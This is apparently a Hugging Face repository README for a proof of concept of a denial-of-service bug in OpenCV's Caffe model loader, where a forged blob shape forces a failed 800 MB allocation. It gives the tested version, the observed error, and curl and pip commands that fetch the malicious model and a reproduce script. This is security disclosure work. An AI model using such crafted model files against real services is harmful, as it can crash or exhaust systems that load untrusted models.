Caffe blob-shape allocation DoS PoC

This repository contains a benign security research PoC for a Caffe model file whose forged BlobProto.shape drives allocation failure in cv2.dnn.readNetFromCaffe(...).

Files:

  • tiny_fc.prototxt
  • control_fc_blob_shape_2x2.caffemodel
  • malicious_fc_blob_shape_100m_x2.caffemodel
  • reproduce.py
  • requirements.txt

Tested environment:

  • opencv-python==4.13.0.92
  • runtime cv2.__version__ == 4.13.0

Observed behavior:

  • control model:
    • loads successfully
  • malicious model:
    • after the process address-space cap is tightened to 800 MiB
    • raises: Failed to allocate 800000000 bytes

Reproduction:

python3 -m venv /tmp/caffe-blob-shape-dos
/tmp/caffe-blob-shape-dos/bin/pip install -U pip
/tmp/caffe-blob-shape-dos/bin/pip install -r requirements.txt

curl -L -O https://huggingface.co/hacnho/caffe-blob-shape-allocation-dos-poc/resolve/main/tiny_fc.prototxt
curl -L -O https://huggingface.co/hacnho/caffe-blob-shape-allocation-dos-poc/resolve/main/control_fc_blob_shape_2x2.caffemodel
curl -L -O https://huggingface.co/hacnho/caffe-blob-shape-allocation-dos-poc/resolve/main/malicious_fc_blob_shape_100m_x2.caffemodel
curl -L -O https://huggingface.co/hacnho/caffe-blob-shape-allocation-dos-poc/resolve/main/reproduce.py
curl -L -O https://huggingface.co/hacnho/caffe-blob-shape-allocation-dos-poc/resolve/main/requirements.txt

/tmp/caffe-blob-shape-dos/bin/python reproduce.py --prototxt tiny_fc.prototxt --control control_fc_blob_shape_2x2.caffemodel --malicious malicious_fc_blob_shape_100m_x2.caffemodel

Repo state at verification time:

  • private=false, commit 08c3638412a27a477567976ab976c01b2716cf45
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support